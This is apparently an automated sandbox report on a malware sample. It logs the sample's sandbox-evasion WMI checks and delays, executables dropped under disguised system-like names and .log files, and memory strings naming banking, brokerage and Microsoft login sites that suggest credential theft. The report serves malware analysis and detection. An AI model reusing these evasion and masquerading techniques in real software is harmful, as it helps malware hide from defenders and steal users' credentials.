                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Window / User API: threadDelayed 7907
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Window / User API: threadDelayed 1567
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oANPimHy.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DVfmUYdt.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LzHTfErB.log
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kDsGBTSe.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dMjZyaMQ.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\umLWkwXM.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bakRRaCx.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vaQeWJTK.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UiajPhxi.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ksQGNTNC.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -582547s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -582235s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -581422s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -580719s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -580390s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -580094s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -579707s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -579359s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -578640s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -578250s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577967s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577719s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577582s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577454s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577265s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -577056s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -576912s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -576703s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -576589s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -576312s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8008Thread sleep time: -300000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -576072s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575915s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575787s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575647s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575523s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575421s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575303s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575185s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -575071s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -574911s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -574781s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -574639s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 8024Thread sleep time: -574529s >= -30000sJump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe TID: 7988Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe TID: 3540Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe TID: 7780Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 4016Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe TID: 1504Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe TID: 2156Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe TID: 7940Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 6844Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe TID: 5204Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe TID: 396Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe TID: 3300Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe TID: 5700Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\user\AppData\Local\Temp
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\user\AppData\Local
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Users\user\Desktop\desktop.ini
                              Source: WAdYZo8ris.23.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                              Source: WAdYZo8ris.23.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2627864937.000000001AFC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                              Source: WAdYZo8ris.23.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                              Source: WAdYZo8ris.23.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                              Source: WAdYZo8ris.23.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                              Source: WAdYZo8ris.23.dr Binary or memory string: outlook.office.comVMware20,11696492231s
                              Source: WAdYZo8ris.23.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                              Source: WAdYZo8ris.23.dr Binary or memory string: AMC password management pageVMware20,11696492231
                              Source: WAdYZo8ris.23.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
                              Source: w32tm.exe, 00000013.00000002.1353453529.0000027ED0DB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                              Source: WAdYZo8ris.23.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                              Source: WAdYZo8ris.23.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                              Source: WAdYZo8ris.23.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                              Source: WAdYZo8ris.23.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                              Source: WAdYZo8ris.23.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2632840002.000000001B7AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CaVMware20
                              Source: WAdYZo8ris.23.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                              Source: WAdYZo8ris.23.dr Binary or memory string: discord.comVMware20,11696492231f
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2632840002.000000001B7AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ra Change Transaction PasswordVMware20,11696492231
                              Source: WAdYZo8ris.23.dr Binary or memory string: global block list test formVMware20,11696492231
                              Source: WAdYZo8ris.23.dr Binary or memory string: dev.azure.comVMware20,11696492231j
                              Source: WAdYZo8ris.23.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                              Source: WAdYZo8ris.23.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                              Source: WAdYZo8ris.23.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
                              Source: WAdYZo8ris.23.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                              Source: WAdYZo8ris.23.dr Binary or memory string: tasks.office.comVMware20,11696492231o
                              Source: WAdYZo8ris.23.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                              Source: jW5TA1J9Z1.exe, 00000017.00000002.2632840002.000000001B7AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20
                              Source: WAdYZo8ris.23.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                              Source: WAdYZo8ris.23.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                              Source: WAdYZo8ris.23.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
                              Source: WAdYZo8ris.23.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                              Source: WAdYZo8ris.23.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                              Source: WAdYZo8ris.23.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                              Source: WAdYZo8ris.23.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Memory allocated: page read and write | page guard
